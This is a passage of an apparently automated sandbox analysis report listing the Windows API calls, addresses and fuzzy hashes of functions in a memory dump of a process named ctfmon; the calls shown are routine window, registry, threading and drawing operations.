        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Long$Parent$Visible
        • String ID:
        • API String ID: 3473418232-0
        • Opcode ID: ad1c60d7dd1bbe177aea25ad133d5d740d3cacff3b0c382cf55e85d750fcfac4
        • Instruction ID: ba862818f269e3aceee2273a44a1f29cc0207a7b62508aff36e6de7303c25c2b
        • Opcode Fuzzy Hash: ad1c60d7dd1bbe177aea25ad133d5d740d3cacff3b0c382cf55e85d750fcfac4
        • Instruction Fuzzy Hash: FD219072740724ABD731AB669C89F2FB2ACAF40754F44873ABD41B72D1C638DC0587A8
        APIs
        • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,?,00425B7A,?), ref: 00425BBA
        • GetFileTime.KERNEL32(00000000,z[B,?,?,?,?,?,?,?,?,?,00425B7A,?), ref: 00425BDB
        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00425B7A,?), ref: 00425BEA
        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00425B7A,?), ref: 00425C0B
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: File$AttributesSizeTimelstrcpyn
        • String ID: z[B$z[B
        • API String ID: 1499663573-648401610
        • Opcode ID: e76c36bad1554bebe900693a779f145176d16c0a690a29c8f3f1c0784b4361d4
        • Instruction ID: b0b1fca4624fb2a0d4a84746afc2279bc6a5ac128e51e5953a8924eafc8c791d
        • Opcode Fuzzy Hash: e76c36bad1554bebe900693a779f145176d16c0a690a29c8f3f1c0784b4361d4
        • Instruction Fuzzy Hash: 2B318072600615AFC720DFA1DCC5AABBBB8BB14310F504A2AF156D7280E774B989CB94
        APIs
        • GetCapture.USER32 ref: 00427264
        • SendMessageW.USER32(00000000,00000365,00000000,00000000), ref: 00427281
        • GetFocus.USER32 ref: 00427293
        • SendMessageW.USER32(00000000,00000365,00000000,00000000), ref: 004272A3
        • GetLastActivePopup.USER32(?), ref: 004272C6
        • SendMessageW.USER32(00000000,00000365,00000000,00000000), ref: 004272D6
        • SendMessageW.USER32(?,00000111,0000E147,00000000), ref: 004272F5
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: MessageSend$ActiveCaptureFocusLastPopup
        • String ID:
        • API String ID: 3219385341-0
        • Opcode ID: 2cfbcd3abc8782fe34278c35964e10fb786888f8cf757bf9c0f9356a80920232
        • Instruction ID: 68473f9b5d7e177251982a610d2712512d6c7068ce16a05e5002633df34013cc
        • Opcode Fuzzy Hash: 2cfbcd3abc8782fe34278c35964e10fb786888f8cf757bf9c0f9356a80920232
        • Instruction Fuzzy Hash: 7011A076308229FBD6106A62FC84C3F7A6CDB827D9B9204AFF90193201DE299C06453E
        APIs
        • GetWindowRect.USER32(?), ref: 0041DF20
        • GetWindowLongA.USER32(?,000000F0), ref: 0041DF29
        • InflateRect.USER32(?,00000001,00000001), ref: 0041DF88
        • GetParent.USER32(?), ref: 0041DF8F
        • ScreenToClient.USER32(00000000,?), ref: 0041DFA3
        • ScreenToClient.USER32(00000000,?), ref: 0041DFAB
        • InvalidateRect.USER32(00000000,?,00000000), ref: 0041DFC1
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
        • String ID:
        • API String ID: 1809568455-0
        • Opcode ID: 58f5927d627f06ebdb3d6c3f4d4a38317ab9f67d64c63de6d6abd1e3eb937c86
        • Instruction ID: 5c4ce70eba9561d943b507e3d2f7660809a151edc0751f07b28f757fc8d36fc6
        • Opcode Fuzzy Hash: 58f5927d627f06ebdb3d6c3f4d4a38317ab9f67d64c63de6d6abd1e3eb937c86
        • Instruction Fuzzy Hash: BA218B72A00201AFD714DB14D8D4FBF73A9EF94760F40091EF95692291D738E986C76A
        APIs
        • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00428D8A
        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00428DAD
        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00428DCC
        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00428DDC
        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00428DE6
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CloseCreate$Open
        • String ID: software
        • API String ID: 1740278721-2010147023
        • Opcode ID: 69adb2aea5cc14ec8ae342babbe5f54ff3db835e943cfe2388184d54ff1eedc4
        • Instruction ID: b72b22ee4a62b1fdbc469c719b3260cc0ea8d96049bfbdf274d8e70cb96c8cd0
        • Opcode Fuzzy Hash: 69adb2aea5cc14ec8ae342babbe5f54ff3db835e943cfe2388184d54ff1eedc4
        • Instruction Fuzzy Hash: 9A11E372E01128FBCB21CB9ADC84DEFFFBCEF95700F5000AAA504A2121D6709A05DBA4
        APIs
        • GetMapMode.GDI32(?,00000000,?,?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 00427965
        • GetDeviceCaps.GDI32(?,00000058), ref: 0042799F
        • GetDeviceCaps.GDI32(?,0000005A), ref: 004279A8
          • Part of subcall function 0042657D: GetWindowExtEx.GDI32(?,00407774,00000000,?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042658E
          • Part of subcall function 0042657D: GetViewportExtEx.GDI32(?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042659B
          • Part of subcall function 0042657D: MulDiv.KERNEL32(00407774,00000000,00000000), ref: 004265C0
          • Part of subcall function 0042657D: MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 004265DB
        • MulDiv.KERNEL32(tw@,00000060,000009EC), ref: 004279CC
        • MulDiv.KERNEL32(00000002,?,000009EC), ref: 004279D7
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CapsDevice$ModeViewportWindow
        • String ID: tw@
        • API String ID: 2598972148-3122378559
        • Opcode ID: 30f29e222e4cb38219f326d3fb46cec9727d7915d3471bf8a7ceecbc678bfd42
        • Instruction ID: 92b9790e69b5446d6c958f7dd1d8ca38bdb3d9c6a46825f3b35b29f8475d5c98
        • Opcode Fuzzy Hash: 30f29e222e4cb38219f326d3fb46cec9727d7915d3471bf8a7ceecbc678bfd42
        • Instruction Fuzzy Hash: A3110E72700610EFEB21AF59DC44C2FBBA9EF89710B41402AE98587371C731AC82CF98
        APIs
        • GetWindowLongA.USER32(?,000000F0), ref: 0041DFDD
        • GetWindowRect.USER32(?,?), ref: 0041DFEB
        • InflateRect.USER32(?,00000001,00000001), ref: 0041DFFA
        • GetParent.USER32(?), ref: 0041E001
        • ScreenToClient.USER32(00000000,?), ref: 0041E015
        • ScreenToClient.USER32(00000000,?), ref: 0041E01D
        • ValidateRect.USER32(00000000,?), ref: 0041E031
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Rect$ClientScreenWindow$InflateLongParentValidate
        • String ID:
        • API String ID: 2275295265-0
        • Opcode ID: a915bac04b4fb549f67fcc827fd90f6c4676513c8cc0a7a62b76d954d98b73d1
        • Instruction ID: 6b051f3026c86bdc512559a30bcbe6d5191d46f4b5e6e7f40c6fc7ebd371f8c1
        • Opcode Fuzzy Hash: a915bac04b4fb549f67fcc827fd90f6c4676513c8cc0a7a62b76d954d98b73d1
        • Instruction Fuzzy Hash: 91F08136100202BFD321EB54DCC8DBF77BCEBC9B24F404929F91592151D774A80A8B66
        APIs
        • GetSysColor.USER32(0000000F), ref: 00424D60
        • GetSysColor.USER32(00000010), ref: 00424D67
        • GetSysColor.USER32(00000014), ref: 00424D6E
        • GetSysColor.USER32(00000012), ref: 00424D75
        • GetSysColor.USER32(00000006), ref: 00424D7C
        • GetSysColorBrush.USER32(0000000F), ref: 00424D89
        • GetSysColorBrush.USER32(00000006), ref: 00424D90
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Color$Brush
        • String ID:
        • API String ID: 2798902688-0
        • Opcode ID: 92d1a130750778a343b254b49833808b75e99ffc954d900b7f748f2d3a603d37
        • Instruction ID: 18969bc28ed302142f8635eec16f63b65d63ba9001d0164203a570e39b19960d
        • Opcode Fuzzy Hash: 92d1a130750778a343b254b49833808b75e99ffc954d900b7f748f2d3a603d37
        • Instruction Fuzzy Hash: 1EF0F871A407489BD730AB729D49B4BBAE0FFC4B10F02092AD2858BA90E6B5F4419F44
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Version$ClipboardFormatRegister
        • String ID: MSWHEEL_ROLLMSG
        • API String ID: 2888461884-2485103130
        • Opcode ID: e99812611a21f9011ea4a185b951aeef274692d9465cad14e96c1549da805e4a
        • Instruction ID: f412c579cb3b66504e538c215866e8624d94ca82ea27c6ff18154eccb9f95b5c
        • Opcode Fuzzy Hash: e99812611a21f9011ea4a185b951aeef274692d9465cad14e96c1549da805e4a
        • Instruction Fuzzy Hash: F4E0483AF15136D5D71137B4BD4876A25945B58351FE10077DA01433519A3C4483DB7E
        APIs
        • TlsGetValue.KERNEL32(0053F118,0053EDA8,00000000,?,0053F118,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A18
        • EnterCriticalSection.KERNEL32(0053F134,00000010,?,0053F118,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A67
        • LeaveCriticalSection.KERNEL32(0053F134,00000000,?,0053F118,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A7A
        • LocalAlloc.KERNEL32(00000000,00000004,?,0053F118,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A90
        • LocalReAlloc.KERNEL32(?,00000004,00000002,?,0053F118,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428AA2
        • TlsSetValue.KERNEL32(0053F118,00000000), ref: 00428ADE
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AllocCriticalLocalSectionValue$EnterLeave
        • String ID:
        • API String ID: 4117633390-0
        • Opcode ID: 13d111e48e1bc65edc326abf01420470da07a7052a1c5e31779b3603b3111ea6
        • Instruction ID: 683b195803cd3318d752987fd83c5c11aee9b06666c6d2078921f9177f6cc79e
        • Opcode Fuzzy Hash: 13d111e48e1bc65edc326abf01420470da07a7052a1c5e31779b3603b3111ea6
        • Instruction Fuzzy Hash: 4F31AB31200615EFD724CF15D88AF6AB3A8FF44354F80892EE41AC7690DB74E816CB64
        APIs
        • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041F348
        • GetWindowTextLengthA.USER32(?), ref: 0041F352
        • GetWindowTextA.USER32(?,00000000,00000000), ref: 0041F37A
        • SetTextColor.GDI32(?,?), ref: 0041F3BB
        • DrawTextA.USER32(?,00000000,000000FF,?,?), ref: 0041F3D3
        • SetTextColor.GDI32(?,?), ref: 0041F3E5
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Text$ColorWindow$DrawLength
        • String ID:
        • API String ID: 1177705772-0
        • Opcode ID: 85627abb918a3084de23618f61da1971933a665179132a7b318545b2f05277eb
        • Instruction ID: b26f12578afaccc9f8427d079972224ff864cef3ef88deb0b21f074a4f367360
        • Opcode Fuzzy Hash: 85627abb918a3084de23618f61da1971933a665179132a7b318545b2f05277eb
        • Instruction Fuzzy Hash: 6D215C76600108AFC724DF98DC84ABF77A9EF84321B148229FD1997390D634AD45CB64
        APIs
        • __EH_prolog.LIBCMT ref: 0042280E
        • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 0042285B
        • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 0042287D
        • GetCapture.USER32 ref: 0042288F
        • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 0042289E
        • WinHelpW.USER32(?,?,?,?), ref: 004228B2
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: MessageSend$CaptureH_prologHelp
        • String ID:
        • API String ID: 432264411-0
        • Opcode ID: 351ca17ef3e89ffa8c86497c2370513ed9314193ee064a8a9955204cf86f37c4
        • Instruction ID: 321176f5cdc229f6ee6c7f21b62b50d57b21ffd69a4491bdf23897e4f3332011
        • Opcode Fuzzy Hash: 351ca17ef3e89ffa8c86497c2370513ed9314193ee064a8a9955204cf86f37c4
        • Instruction Fuzzy Hash: 44219131340214BFEB30AF65DC89F6E7BA9EF04744F40456DB1019B1E2CB799C008624
        APIs
        • GetParent.USER32(?), ref: 004271E6
        • GetLastActivePopup.USER32(?), ref: 004271F5
        • IsWindowEnabled.USER32(?), ref: 0042720A
        • EnableWindow.USER32(?,00000000), ref: 0042721D
        • GetWindowLongW.USER32(?,000000F0), ref: 0042722F
        • GetParent.USER32(?), ref: 0042723D
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
        • String ID:
        • API String ID: 670545878-0
        • Opcode ID: 829b2fd447a7a265a2830058b677b447dcf963bf07e075df5b6d77de7654244f
        • Instruction ID: b477ea236e12bf6e9f048e8246984b22bba05b7c439d68dba564573c6702b4fa
        • Opcode Fuzzy Hash: 829b2fd447a7a265a2830058b677b447dcf963bf07e075df5b6d77de7654244f
        • Instruction Fuzzy Hash: F811A332B093319787316A6ABD94B3B729C5F55B50FC501A6FD00E3301DB28DD1246BD
        APIs
        • GetCommandLineW.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF64
        • GetCommandLineA.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF76
        • GetCommandLineW.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF8D
        • GetCommandLineA.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF96
        • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,0040D0B4), ref: 0040FFAF
        • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,0040D0B4), ref: 0040FFD4
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CommandLine$ByteCharMultiWide
        • String ID:
        • API String ID: 3068183746-0
        • Opcode ID: 3c780290e16532da1a94cc39dc3a8878b2115943691280b670c6d4727a397ac2
        • Instruction ID: 64f274b490bb9753f35f974b03313c599961d3a4b4ccc6cea9b6a40c69df2725
        • Opcode Fuzzy Hash: 3c780290e16532da1a94cc39dc3a8878b2115943691280b670c6d4727a397ac2
        • Instruction Fuzzy Hash: E011C83270911B6BDA3057A69C40F2B369CDB533A4F210177F500F6BD0DAB5DC4956A9
        APIs
        • WaitForSingleObject.KERNEL32(00000338,000000FF,?,?,0053CB68,00403D13,?,00000049), ref: 00402F3E
        • ResetEvent.KERNEL32(00000338,?,0053CB68,00403D13,?,00000049), ref: 00402F47
        • SetEvent.KERNEL32(0000033C,?,0053CB68,00403D13,?,00000049), ref: 00402F77
        • WaitForSingleObject.KERNEL32(0000033C,00000064,?,0053CB68,00403D13,?,00000049), ref: 00402F88
        • Sleep.KERNEL32(0000000A,?,0053CB68,00403D13,?,00000049), ref: 00402F93
        • SetEvent.KERNEL32(00000338,?,0053CB68,00403D13,?,00000049), ref: 00402F9E
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Event$ObjectSingleWait$ResetSleep
        • String ID:
        • API String ID: 3757991767-0
        • Opcode ID: c552385a51d22ba56084d703d5a1d3e4d9b6c6ab6055f6c746357635fa96cf77
        • Instruction ID: cce5b26dfa6e14c825b22c7865c66c1ad55053d17271cdbe5a1c1e3b5b80d322
        • Opcode Fuzzy Hash: c552385a51d22ba56084d703d5a1d3e4d9b6c6ab6055f6c746357635fa96cf77
        • Instruction Fuzzy Hash: 910171767002115BCA14DB68FD8491E73B9F79C7207540629E905A33E0CBB4E805DB74
        APIs
        • ClientToScreen.USER32(?,?), ref: 004269D4
        • GetWindow.USER32(?,00000005), ref: 004269E5
        • GetDlgCtrlID.USER32(00000000), ref: 004269EE
        • GetWindowLongW.USER32(00000000,000000F0), ref: 004269FD
        • GetWindowRect.USER32(00000000,?), ref: 00426A0F
        • PtInRect.USER32(?,?,?), ref: 00426A1F
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Rect$ClientCtrlLongScreen
        • String ID:
        • API String ID: 1315500227-0
        • Opcode ID: 7be549c15be2d0881abb1e3d0c118bfa54edfa45425f65dce38ef14f92b6c35a
        • Instruction ID: 1c1bb1606c7b6fcb0188c767b7bd5df6e6ab6d9813dcdc4c782d48c425fdd25b
        • Opcode Fuzzy Hash: 7be549c15be2d0881abb1e3d0c118bfa54edfa45425f65dce38ef14f92b6c35a
        • Instruction Fuzzy Hash: 6F018435340135BBDB219F55AC48EEF7B6CFF06710F818032F911A1164DB34D9568B98
        APIs
        • __EH_prolog.LIBCMT ref: 004099BE
        • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 00409ADA
        • CoTaskMemFree.OLE32(?,?,00000000), ref: 00409CC1
        Strings
